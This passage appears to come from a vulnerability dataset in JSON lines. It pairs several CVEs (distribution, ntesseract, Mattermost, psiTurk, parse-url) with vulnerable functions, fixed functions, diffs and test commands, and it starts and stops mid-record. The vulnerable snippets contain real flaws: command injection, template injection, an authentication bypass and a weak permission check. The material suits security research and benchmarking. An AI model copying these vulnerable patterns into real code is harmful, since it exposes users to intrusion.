of version 3.0.0-rc.3. There is no way to work around this issue without patching if the system requires token authentication.", "cwe_info": {"CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/distribution/distribution", "patch_url": ["https://github.com/distribution/distribution/commit/5ea9aa028db65ca5665f6af2c20ecf9dc34e5fcd"], "programing_language": "Go", "vul_func": [{"id": "vul_go_68_1", "commit": "939a525", "file_path": "registry/auth/token/token.go", "start_line": 215, "end_line": 251, "snippet": "func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (signingKey crypto.PublicKey, err error) {\n\tjwk := header.JSONWebKey\n\tsigningKey = jwk.Key\n\n\t// Check to see if the key includes a certificate chain.\n\tif len(jwk.Certificates) == 0 {\n\t\t// The JWK should be one of the trusted root keys.\n\t\tif _, trusted := verifyOpts.TrustedKeys[jwk.KeyID]; !trusted {\n\t\t\treturn nil, errors.New(\"untrusted JWK with no certificate chain\")\n\t\t}\n\t\t// The JWK is one of the trusted keys.\n\t\treturn\n\t}\n\n\topts := x509.VerifyOptions{\n\t\tRoots: verifyOpts.Roots,\n\t\tKeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageAny},\n\t}\n\n\tleaf := jwk.Certificates[0]\n\tif opts.Intermediates == nil {\n\t\topts.Intermediates = x509.NewCertPool()\n\t\tfor _, intermediate := range jwk.Certificates[1:] {\n\t\t\topts.Intermediates.AddCert(intermediate)\n\t\t}\n\t}\n\n\t// TODO: this call returns certificate chains which we ignore for now, but\n\t// we should check them for revocations if we have the ability later.\n\tchains, err := leaf.Verify(opts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsigningKey = getCertPubKey(chains)\n\n\treturn\n}"}], "fix_func": [{"id": "fix_go_68_1", "commit": "5ea9aa0", "file_path": "registry/auth/token/token.go", "start_line": 215, "end_line": 250, "snippet": "func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (crypto.PublicKey, error) {\n\tjwk := header.JSONWebKey\n\n\t// Check to see if the key includes a certificate chain.\n\tif len(jwk.Certificates) == 0 {\n\t\t// The JWK should be one of the trusted root keys.\n\t\tkey, trusted := verifyOpts.TrustedKeys[jwk.KeyID]\n\t\tif !trusted {\n\t\t\treturn nil, errors.New(\"untrusted JWK with no certificate chain\")\n\t\t}\n\t\t// The JWK is one of the trusted keys.\n\t\treturn key, nil\n\t}\n\n\topts := x509.VerifyOptions{\n\t\tRoots: verifyOpts.Roots,\n\t\tKeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageAny},\n\t}\n\n\tleaf := jwk.Certificates[0]\n\tif opts.Intermediates == nil {\n\t\topts.Intermediates = x509.NewCertPool()\n\t\tfor _, intermediate := range jwk.Certificates[1:] {\n\t\t\topts.Intermediates.AddCert(intermediate)\n\t\t}\n\t}\n\n\t// TODO: this call returns certificate chains which we ignore for now, but\n\t// we should check them for revocations if we have the ability later.\n\tchains, err := leaf.Verify(opts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn getCertPubKey(chains), nil\n}"}], "vul_patch": "--- a/registry/auth/token/token.go\n+++ b/registry/auth/token/token.go\n@@ -1,15 +1,15 @@\n-func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (signingKey crypto.PublicKey, err error) {\n+func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (crypto.PublicKey, error) {\n \tjwk := header.JSONWebKey\n-\tsigningKey = jwk.Key\n \n \t// Check to see if the key includes a certificate chain.\n \tif len(jwk.Certificates) == 0 {\n \t\t// The JWK should be one of the trusted root keys.\n-\t\tif _, trusted := verifyOpts.TrustedKeys[jwk.KeyID]; !trusted {\n+\t\tkey, trusted := verifyOpts.TrustedKeys[jwk.KeyID]\n+\t\tif !trusted {\n \t\t\treturn nil, errors.New(\"untrusted JWK with no certificate chain\")\n \t\t}\n \t\t// The JWK is one of the trusted keys.\n-\t\treturn\n+\t\treturn key, nil\n \t}\n \n \topts := x509.VerifyOptions{\n@@ -31,7 +31,6 @@\n \tif err != nil {\n \t\treturn nil, err\n \t}\n-\tsigningKey = getCertPubKey(chains)\n \n-\treturn\n+\treturn getCertPubKey(chains), nil\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-24976:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/distribution\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestVerifyJWKWithTrustedKey$ github.com/distribution/distribution/v3/registry/auth/token\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-24976:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/distribution\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestTokenVerify|TestAccessController|TestLeeway|TestNewAccessControllerPemBlock)$' github.com/distribution/distribution/v3/registry/auth/token"} {"cve_id": "CVE-2020-28446", "cve_description": "The package ntesseract before 0.2.9 are vulnerable to Command Injection via lib/tesseract.js.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/taoyuan/ntesseract", "patch_url": ["https://github.com/taoyuan/ntesseract/commit/fcbc36f381798b4362179c0cdf9961b437c7b619"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_221_1", "commit": "a3ffac9", "file_path": "lib/tesseract.js", "start_line": 38, "end_line": 62, "snippet": " command: function (image, options) {\n // assemble tesseract command\n const command = [options.binary, image, options.output];\n\n if (options.l !== null) {\n command.push('-l ' + options.l);\n }\n\n if (options.psm !== null) {\n command.push('--psm ' + options.psm);\n }\n\n if (options.config !== null) {\n command.push(options.config);\n }\n\n const names = Object.keys(options);\n names.forEach(function (name) {\n if (name.indexOf('-') === 0) {\n command.push(name + ' ' + options[name]);\n }\n });\n\n return command.join(' ');\n },"}], "fix_func": [{"id": "fix_js_221_1", "commit": "fcbc36f381798b4362179c0cdf9961b437c7b619", "file_path": "lib/tesseract.js", "start_line": 38, "end_line": 66, "snippet": " command: function (image, options) {\n if (image.startsWith('\"')) {\n image = '\"' + image + '\"';\n }\n\n // assemble tesseract command\n const command = [options.binary, image, options.output];\n\n if (options.l !== null) {\n command.push('-l ' + options.l);\n }\n\n if (options.psm !== null) {\n command.push('--psm ' + options.psm);\n }\n\n if (options.config !== null) {\n command.push(options.config);\n }\n\n const names = Object.keys(options);\n names.forEach(function (name) {\n if (name.indexOf('-') === 0) {\n command.push(name + ' ' + options[name]);\n }\n });\n\n return command.join(' ');\n },"}], "vul_patch": "--- a/lib/tesseract.js\n+++ b/lib/tesseract.js\n@@ -1,4 +1,8 @@\n command: function (image, options) {\n+ if (image.startsWith('\"')) {\n+ image = '\"' + image + '\"';\n+ }\n+\n // assemble tesseract command\n const command = [options.binary, image, options.output];\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1332", "cve_description": "One of the API in Mattermost version 6.4.1 and earlier fails to properly protect the permissions, which allows the authenticated members with restricted custom admin role to bypass the restrictions and view the server logs and server config.json file contents.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/mattermost/mattermost", "patch_url": ["https://github.com/mattermost/mattermost/commit/20c73013176ae9cce4c1f91cbfb7d3a43858056e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_100_1", "commit": "f6fef93", "file_path": "api4/system.go", "start_line": 75, "end_line": 126, "snippet": "func generateSupportPacket(c *Context, w http.ResponseWriter, r *http.Request) {\n\tconst FileMime = \"application/zip\"\n\tconst OutputDirectory = \"support_packet\"\n\n\tif *c.App.Config().ExperimentalSettings.RestrictSystemAdmin {\n\t\tc.Err = model.NewAppError(\"generateSupportPacket\", \"api.restricted_system_admin\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\t// Checking to see if the user is a admin of any sort or not\n\t// If they are a admin, they should theoretically have access to one or more of the system console read permissions\n\tif !c.App.SessionHasPermissionToAny(*c.AppContext.Session(), model.SysconsoleReadPermissions) {\n\t\tc.SetPermissionError(model.SysconsoleReadPermissions...)\n\t\treturn\n\t}\n\n\t// Checking to see if the server has a e10 or e20 license (this feature is only permitted for servers with licenses)\n\tif c.App.Srv().License() == nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.no_license\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileDatas := c.App.GenerateSupportPacket()\n\n\t// Constructing the ZIP file name as per spec (mattermost_support_packet_YYYY-MM-DD-HH-MM.zip)\n\tnow := time.Now()\n\toutputZipFilename := fmt.Sprintf(\"mattermost_support_packet_%s.zip\", now.Format(\"2006-01-02-03-04\"))\n\n\tfileStorageBackend := c.App.FileBackend()\n\n\t// We do this incase we get concurrent requests, we will always have a unique directory.\n\t// This is to avoid the situation where we try to write to the same directory while we are trying to delete it (further down)\n\toutputDirectoryToUse := OutputDirectory + \"_\" + model.NewId()\n\terr := c.App.CreateZipFileAndAddFiles(fileStorageBackend, fileDatas, outputZipFilename, outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_create_zip_file\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileBytes, err := fileStorageBackend.ReadFile(path.Join(outputDirectoryToUse, outputZipFilename))\n\tdefer fileStorageBackend.RemoveDirectory(outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_read_file_from_backend\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\tfileBytesReader := bytes.NewReader(fileBytes)\n\n\t// Send the zip file back to client\n\t// We are able to pass 0 for content size due to the fact that Golang's serveContent (https://golang.org/src/net/http/fs.go)\n\t// already sets that for us\n\twriteFileResponse(outputZipFilename, FileMime, 0, now, *c.App.Config().ServiceSettings.WebserverMode, fileBytesReader, true, w, r)\n}"}], "fix_func": [{"id": "fix_go_100_1", "commit": "20c73013176ae9cce4c1f91cbfb7d3a43858056e", "file_path": "api4/system.go", "start_line": 75, "end_line": 125, "snippet": "func generateSupportPacket(c *Context, w http.ResponseWriter, r *http.Request) {\n\tconst FileMime = \"application/zip\"\n\tconst OutputDirectory = \"support_packet\"\n\n\tif *c.App.Config().ExperimentalSettings.RestrictSystemAdmin {\n\t\tc.Err = model.NewAppError(\"generateSupportPacket\", \"api.restricted_system_admin\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\t// Support packet generation is limited to system admins (MM-42271).\n\tif !c.App.SessionHasPermissionTo(*c.AppContext.Session(), model.PermissionManageSystem) {\n\t\tc.SetPermissionError(model.PermissionManageSystem)\n\t\treturn\n\t}\n\n\t// Checking to see if the server has a e10 or e20 license (this feature is only permitted for servers with licenses)\n\tif c.App.Srv().License() == nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.no_license\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileDatas := c.App.GenerateSupportPacket()\n\n\t// Constructing the ZIP file name as per spec (mattermost_support_packet_YYYY-MM-DD-HH-MM.zip)\n\tnow := time.Now()\n\toutputZipFilename := fmt.Sprintf(\"mattermost_support_packet_%s.zip\", now.Format(\"2006-01-02-03-04\"))\n\n\tfileStorageBackend := c.App.FileBackend()\n\n\t// We do this incase we get concurrent requests, we will always have a unique directory.\n\t// This is to avoid the situation where we try to write to the same directory while we are trying to delete it (further down)\n\toutputDirectoryToUse := OutputDirectory + \"_\" + model.NewId()\n\terr := c.App.CreateZipFileAndAddFiles(fileStorageBackend, fileDatas, outputZipFilename, outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_create_zip_file\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileBytes, err := fileStorageBackend.ReadFile(path.Join(outputDirectoryToUse, outputZipFilename))\n\tdefer fileStorageBackend.RemoveDirectory(outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_read_file_from_backend\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\tfileBytesReader := bytes.NewReader(fileBytes)\n\n\t// Send the zip file back to client\n\t// We are able to pass 0 for content size due to the fact that Golang's serveContent (https://golang.org/src/net/http/fs.go)\n\t// already sets that for us\n\twriteFileResponse(outputZipFilename, FileMime, 0, now, *c.App.Config().ServiceSettings.WebserverMode, fileBytesReader, true, w, r)\n}"}], "vul_patch": "--- a/api4/system.go\n+++ b/api4/system.go\n@@ -7,10 +7,9 @@\n \t\treturn\n \t}\n \n-\t// Checking to see if the user is a admin of any sort or not\n-\t// If they are a admin, they should theoretically have access to one or more of the system console read permissions\n-\tif !c.App.SessionHasPermissionToAny(*c.AppContext.Session(), model.SysconsoleReadPermissions) {\n-\t\tc.SetPermissionError(model.SysconsoleReadPermissions...)\n+\t// Support packet generation is limited to system admins (MM-42271).\n+\tif !c.App.SessionHasPermissionTo(*c.AppContext.Session(), model.PermissionManageSystem) {\n+\t\tc.SetPermissionError(model.PermissionManageSystem)\n \t\treturn\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-4315", "cve_description": "A vulnerability has been found in NYUCCL psiTurk up to 3.2.0 and classified as critical. This vulnerability affects unknown code of the file psiturk/experiment.py. The manipulation of the argument mode leads to improper neutralization of special elements used in a template engine. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2.1 is able to address this issue. The name of the patch is 47787e15cecd66f2aa87687bf852ae0194a4335f. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-219676.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/NYUCCL/psiTurk", "patch_url": ["https://github.com/NYUCCL/psiTurk/commit/47787e15cecd66f2aa87687bf852ae0194a4335f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_34_1", "commit": "231d566", "file_path": "psiturk/experiment.py", "start_line": 287, "end_line": 391, "snippet": "def advertisement():\n \"\"\"\n This is the url we give for the ad for our 'external question'. The ad has\n to display two different things: This page will be called from within\n mechanical turk, with url arguments hitId, assignmentId, and workerId.\n If the worker has not yet accepted the hit:\n These arguments will have null values, we should just show an ad for\n the experiment.\n If the worker has accepted the hit:\n These arguments will have appropriate values and we should enter the\n person in the database and provide a link to the experiment popup.\n \"\"\"\n user_agent_string = request.user_agent.string\n user_agent_obj = user_agents.parse(user_agent_string)\n browser_ok = True\n browser_exclude_rule = CONFIG.get('Task Parameters', 'browser_exclude_rule')\n for rule in browser_exclude_rule.split(','):\n myrule = rule.strip()\n if myrule in [\"mobile\", \"tablet\", \"touchcapable\", \"pc\", \"bot\"]:\n if (myrule == \"mobile\" and user_agent_obj.is_mobile) or\\\n (myrule == \"tablet\" and user_agent_obj.is_tablet) or\\\n (myrule == \"touchcapable\" and user_agent_obj.is_touch_capable) or\\\n (myrule == \"pc\" and user_agent_obj.is_pc) or\\\n (myrule == \"bot\" and user_agent_obj.is_bot):\n browser_ok = False\n elif myrule == \"Safari\" or myrule == \"safari\":\n if \"Chrome\" in user_agent_string and \"Safari\" in user_agent_string:\n pass\n elif \"Safari\" in user_agent_string:\n browser_ok = False\n elif myrule in user_agent_string:\n browser_ok = False\n\n if not browser_ok:\n # Handler for IE users if IE is not supported.\n raise ExperimentError('browser_type_not_allowed')\n\n if not ('hitId' in request.args and 'assignmentId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_mturk')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n mode = request.args['mode']\n if hit_id[:5] == \"debug\":\n debug_mode = True\n else:\n debug_mode = False\n already_in_db = False\n if 'workerId' in request.args:\n worker_id = request.args['workerId']\n # First check if this workerId has completed the task before (v1).\n nrecords = Participant.query.\\\n filter(Participant.assignmentid != assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n count()\n\n if nrecords > 0: # Already completed task\n already_in_db = True\n else: # If worker has not accepted the hit\n worker_id = None\n try:\n part = Participant.query.\\\n filter(Participant.hitid == hit_id).\\\n filter(Participant.assignmentid == assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n one()\n status = part.status\n except exc.SQLAlchemyError:\n status = None\n\n allow_repeats = CONFIG.getboolean('Task Parameters', 'allow_repeats')\n if (status == STARTED or status == QUITEARLY) and not debug_mode:\n # Once participants have finished the instructions, we do not allow\n # them to start the task again.\n raise ExperimentError('already_started_exp_mturk')\n elif status == COMPLETED or (status == SUBMITTED and not already_in_db):\n # 'or status == SUBMITTED' because we suspect that sometimes the post\n # to mturk fails after we've set status to SUBMITTED, so really they\n # have not successfully submitted. This gives another chance for the\n # submit to work.\n\n # They've finished the experiment but haven't successfully submitted the HIT\n # yet.\n return render_template(\n 'thanks-mturksubmit.html',\n using_sandbox=(mode == \"sandbox\"),\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n elif already_in_db and not (debug_mode or allow_repeats):\n raise ExperimentError('already_did_exp_hit')\n elif status == ALLOCATED or not status or debug_mode:\n # Participant has not yet agreed to the consent. They might not\n # even have accepted the HIT.\n with open('templates/ad.html', 'r') as temp_file:\n ad_string = temp_file.read()\n ad_string = insert_mode(ad_string, mode)\n return render_template_string(\n ad_string,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n else:\n raise ExperimentError('status_incorrectly_set')"}, {"id": "vul_py_34_2", "commit": "231d566", "file_path": "psiturk/experiment.py", "start_line": 396, "end_line": 415, "snippet": "def give_consent():\n \"\"\"\n Serves up the consent in the popup window.\n \"\"\"\n if not ('hitId' in request.args and 'assignmentId' in request.args and\n 'workerId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_consent')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n worker_id = request.args['workerId']\n mode = request.args['mode']\n with open('templates/consent.html', 'r') as temp_file:\n consent_string = temp_file.read()\n consent_string = insert_mode(consent_string, mode)\n return render_template_string(\n consent_string,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )"}, {"id": "vul_py_34_3", "commit": "231d566", "file_path": "psiturk/experiment.py", "start_line": 734, "end_line": 747, "snippet": "def insert_mode(page_html, mode):\n \"\"\" Insert mode \"\"\"\n page_html = page_html\n match_found = False\n matches = re.finditer('workerId={{ workerid }}', page_html)\n match = None\n for match in matches:\n match_found = True\n if match_found:\n new_html = page_html[:match.end()] + \"&mode=\" + mode +\\\n page_html[match.end():]\n return new_html\n else:\n raise ExperimentError(\"insert_mode_failed\")"}], "fix_func": [{"id": "fix_py_34_1", "commit": "47787e15cecd66f2aa87687bf852ae0194a4335f", "file_path": "psiturk/experiment.py", "start_line": 287, "end_line": 392, "snippet": "def advertisement():\n \"\"\"\n This is the url we give for the ad for our 'external question'. The ad has\n to display two different things: This page will be called from within\n mechanical turk, with url arguments hitId, assignmentId, and workerId.\n If the worker has not yet accepted the hit:\n These arguments will have null values, we should just show an ad for\n the experiment.\n If the worker has accepted the hit:\n These arguments will have appropriate values and we should enter the\n person in the database and provide a link to the experiment popup.\n \"\"\"\n user_agent_string = request.user_agent.string\n user_agent_obj = user_agents.parse(user_agent_string)\n browser_ok = True\n browser_exclude_rule = CONFIG.get('Task Parameters', 'browser_exclude_rule')\n for rule in browser_exclude_rule.split(','):\n myrule = rule.strip()\n if myrule in [\"mobile\", \"tablet\", \"touchcapable\", \"pc\", \"bot\"]:\n if (myrule == \"mobile\" and user_agent_obj.is_mobile) or\\\n (myrule == \"tablet\" and user_agent_obj.is_tablet) or\\\n (myrule == \"touchcapable\" and user_agent_obj.is_touch_capable) or\\\n (myrule == \"pc\" and user_agent_obj.is_pc) or\\\n (myrule == \"bot\" and user_agent_obj.is_bot):\n browser_ok = False\n elif myrule == \"Safari\" or myrule == \"safari\":\n if \"Chrome\" in user_agent_string and \"Safari\" in user_agent_string:\n pass\n elif \"Safari\" in user_agent_string:\n browser_ok = False\n elif myrule in user_agent_string:\n browser_ok = False\n\n if not browser_ok:\n # Handler for IE users if IE is not supported.\n raise ExperimentError('browser_type_not_allowed')\n\n if not ('hitId' in request.args and 'assignmentId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_mturk')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n mode = request.args['mode']\n if hit_id[:5] == \"debug\":\n debug_mode = True\n else:\n debug_mode = False\n already_in_db = False\n if 'workerId' in request.args:\n worker_id = request.args['workerId']\n # First check if this workerId has completed the task before (v1).\n nrecords = Participant.query.\\\n filter(Participant.assignmentid != assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n count()\n\n if nrecords > 0: # Already completed task\n already_in_db = True\n else: # If worker has not accepted the hit\n worker_id = None\n try:\n part = Participant.query.\\\n filter(Participant.hitid == hit_id).\\\n filter(Participant.assignmentid == assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n one()\n status = part.status\n except exc.SQLAlchemyError:\n status = None\n\n allow_repeats = CONFIG.getboolean('Task Parameters', 'allow_repeats')\n if (status == STARTED or status == QUITEARLY) and not debug_mode:\n # Once participants have finished the instructions, we do not allow\n # them to start the task again.\n raise ExperimentError('already_started_exp_mturk')\n elif status == COMPLETED or (status == SUBMITTED and not already_in_db):\n # 'or status == SUBMITTED' because we suspect that sometimes the post\n # to mturk fails after we've set status to SUBMITTED, so really they\n # have not successfully submitted. This gives another chance for the\n # submit to work.\n\n # They've finished the experiment but haven't successfully submitted the HIT\n # yet.\n return render_template(\n 'thanks-mturksubmit.html',\n using_sandbox=(mode == \"sandbox\"),\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n elif already_in_db and not (debug_mode or allow_repeats):\n raise ExperimentError('already_did_exp_hit')\n elif status == ALLOCATED or not status or debug_mode:\n # Participant has not yet agreed to the consent. They might not\n # even have accepted the HIT.\n with open('templates/ad.html', 'r') as temp_file:\n ad_string = temp_file.read()\n ad_string = insert_mode(ad_string)\n return render_template_string(\n ad_string,\n mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n else:\n raise ExperimentError('status_incorrectly_set')"}, {"id": "fix_py_34_2", "commit": "47787e15cecd66f2aa87687bf852ae0194a4335f", "file_path": "psiturk/experiment.py", "start_line": 397, "end_line": 417, "snippet": "def give_consent():\n \"\"\"\n Serves up the consent in the popup window.\n \"\"\"\n if not ('hitId' in request.args and 'assignmentId' in request.args and\n 'workerId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_consent')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n worker_id = request.args['workerId']\n mode = request.args['mode']\n with open('templates/consent.html', 'r') as temp_file:\n consent_string = temp_file.read()\n consent_string = insert_mode(consent_string)\n return render_template_string(\n consent_string,\n mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )"}, {"id": "fix_py_34_3", "commit": "47787e15cecd66f2aa87687bf852ae0194a4335f", "file_path": "psiturk/experiment.py", "start_line": 736, "end_line": 749, "snippet": "def insert_mode(page_html):\n \"\"\" Insert mode \"\"\"\n page_html = page_html\n match_found = False\n matches = re.finditer('workerId={{ workerid }}', page_html)\n match = None\n for match in matches:\n match_found = True\n if match_found:\n new_html = page_html[:match.end()] + '&mode={{ mode }}' +\\\n page_html[match.end():]\n return new_html\n else:\n raise ExperimentError(\"insert_mode_failed\")"}], "vul_patch": "--- a/psiturk/experiment.py\n+++ b/psiturk/experiment.py\n@@ -94,9 +94,10 @@\n # even have accepted the HIT.\n with open('templates/ad.html', 'r') as temp_file:\n ad_string = temp_file.read()\n- ad_string = insert_mode(ad_string, mode)\n+ ad_string = insert_mode(ad_string)\n return render_template_string(\n ad_string,\n+ mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n\n--- a/psiturk/experiment.py\n+++ b/psiturk/experiment.py\n@@ -1,3 +1,4 @@\n+def give_consent():\n \"\"\"\n Serves up the consent in the popup window.\n \"\"\"\n@@ -10,9 +11,10 @@\n mode = request.args['mode']\n with open('templates/consent.html', 'r') as temp_file:\n consent_string = temp_file.read()\n- consent_string = insert_mode(consent_string, mode)\n+ consent_string = insert_mode(consent_string)\n return render_template_string(\n consent_string,\n+ mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n\n--- a/psiturk/experiment.py\n+++ b/psiturk/experiment.py\n@@ -1,4 +1,4 @@\n-def insert_mode(page_html, mode):\n+def insert_mode(page_html):\n \"\"\" Insert mode \"\"\"\n page_html = page_html\n match_found = False\n@@ -7,7 +7,7 @@\n for match in matches:\n match_found = True\n if match_found:\n- new_html = page_html[:match.end()] + \"&mode=\" + mode +\\\n+ new_html = page_html[:match.end()] + '&mode={{ mode }}' +\\\n page_html[match.end():]\n return new_html\n else:\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-4315:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/psiTurk\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nPYTHONPATH=. /workspace/PoC_env/CVE-2021-4315/bin/python -m pytest tests/test_psiturk.py -k \"test_insert_mode\" --override-ini=\"addopts=\" -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-4315:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/psiTurk\ngit apply --whitespace=nowarn /workspace/fix.patch\nPYTHONPATH=. /workspace/PoC_env/CVE-2021-4315/bin/python -m pytest tests/test_psiturk.py -k \"not test_insert_mode\" --override-ini=\"addopts=\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-0722", "cve_description": "Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository ionicabizau/parse-url prior to 7.0.0.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/ionicabizau/parse-url", "patch_url": ["https://github.com/ionicabizau/parse-url/commit/21c72ab9412228eea753e2abc48f8962707b1fe3"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_53_1", "commit": "fa488b2f26715995251c30825398e6aa96a0aadf", "file_path": "lib/index.js", "start_line": 35, "end_line": 49, "snippet": "function parseUrl(url, normalize = false) {\n if (typeof url !== \"string\" || !url.trim()) {\n throw new Error(\"Invalid url.\")\n }\n if (normalize) {\n if (typeof normalize !== \"object\") {\n normalize = {\n stripHash: false\n }\n }\n url = normalizeUrl(url, normalize)\n }\n const parsed = parsePath(url)\n return parsed;\n}"}], "fix_func": [{"id": "fix_js_53_1", "commit": "21c72ab9412228eea753e2abc48f8962707b1fe3", "file_path": "lib/index.js", "start_line": 37, "end_line": 70, "snippet": "const parseUrl = (url, normalize = false) => {\n\n // Constants\n const GIT_RE = /((git@|http(s)?:\\/\\/)([\\w\\.@]+)(\\/|:))(([\\~,\\w,\\-,\\_,\\/]+)(.git){0,1}((\\/){0,1}))/\n\n if (typeof url !== \"string\" || !url.trim()) {\n throw new Error(\"Invalid url.\")\n }\n\n if (normalize) {\n if (typeof normalize !== \"object\") {\n normalize = {\n stripHash: false\n }\n }\n url = normalizeUrl(url, normalize)\n }\n\n const parsed = parsePath(url)\n\n // Potential git-ssh urls\n if (parsed.protocol === \"file\") {\n const matched = parsed.href.match(GIT_RE)\n if (matched) {\n parsed.protocols = [\"ssh\"]\n parsed.protocol = \"ssh\"\n parsed.resource = matched[4]\n parsed.user = \"git\"\n parsed.pathname = `/${matched[6]}`\n }\n }\n\n return parsed;\n}"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -1,7 +1,12 @@\n-function parseUrl(url, normalize = false) {\n+const parseUrl = (url, normalize = false) => {\n+\n+ // Constants\n+ const GIT_RE = /((git@|http(s)?:\\/\\/)([\\w\\.@]+)(\\/|:))(([\\~,\\w,\\-,\\_,\\/]+)(.git){0,1}((\\/){0,1}))/\n+\n if (typeof url !== \"string\" || !url.trim()) {\n throw new Error(\"Invalid url.\")\n }\n+\n if (normalize) {\n if (typeof normalize !== \"object\") {\n normalize = {\n@@ 